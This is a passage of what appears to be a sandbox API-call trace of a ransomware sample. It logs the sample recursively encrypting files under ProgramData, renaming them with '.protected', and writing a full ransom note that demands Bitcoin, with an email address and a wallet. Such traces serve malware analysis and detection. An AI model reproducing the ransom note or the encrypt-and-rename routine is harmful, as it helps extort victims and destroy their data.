Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 
[0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".rar") returned 0x0 [0075.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0075.083] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".zip") returned 0x0 [0075.083] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.085] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.085] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.086] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.086] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.086] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.086] CloseHandle (hObject=0xd8) returned 1 [0075.087] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 154 [0075.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.protected")) returned 1 [0075.088] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0075.088] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0075.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 133 [0075.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.094] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.094] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.095] lstrlenA (lpString="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") returned 684 [0075.095] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.095] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.095] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.095] CloseHandle (hObject=0xd4) returned 1 [0075.096] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.096] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.096] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0075.096] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.097] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.097] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.097] lstrlenA (lpString="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") returned 684 [0075.097] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.098] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.098] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0075.098] CloseHandle (hObject=0xb4) returned 1 [0075.098] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.098] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.099] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0075.099] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.099] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.099] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.100] lstrlenA (lpString="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") returned 684 [0075.100] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.100] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.100] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0075.100] CloseHandle (hObject=0xa4) returned 1 [0075.100] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Windows") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Program Files") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.100] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.100] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0075.100] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0075.100] lstrcmpW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0075.100] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned 84 [0075.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.101] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1=".", 
lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\.") returned 84 [0075.101] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.101] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\..") returned 85 [0075.101] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.101] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.101] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0075.101] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.101] lstrcmpW 
(lpString1="packages", lpString2="..") returned 1 [0075.102] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned 93 [0075.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0075.342] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\.") returned 93 [0075.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.342] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\..") returned 94 [0075.342] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0075.342] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0075.343] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0075.343] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0075.343] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0075.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0075.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0075.348] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\.") returned 114 [0075.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.348] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.349] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\..") returned 115 [0075.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.349] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0075.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.349] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0075.349] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0075.349] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.349] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0075.350] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.371] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.371] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.371] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.371] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.404] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.404] CloseHandle (hObject=0xd8) returned 1 [0075.405] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 131 [0075.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package 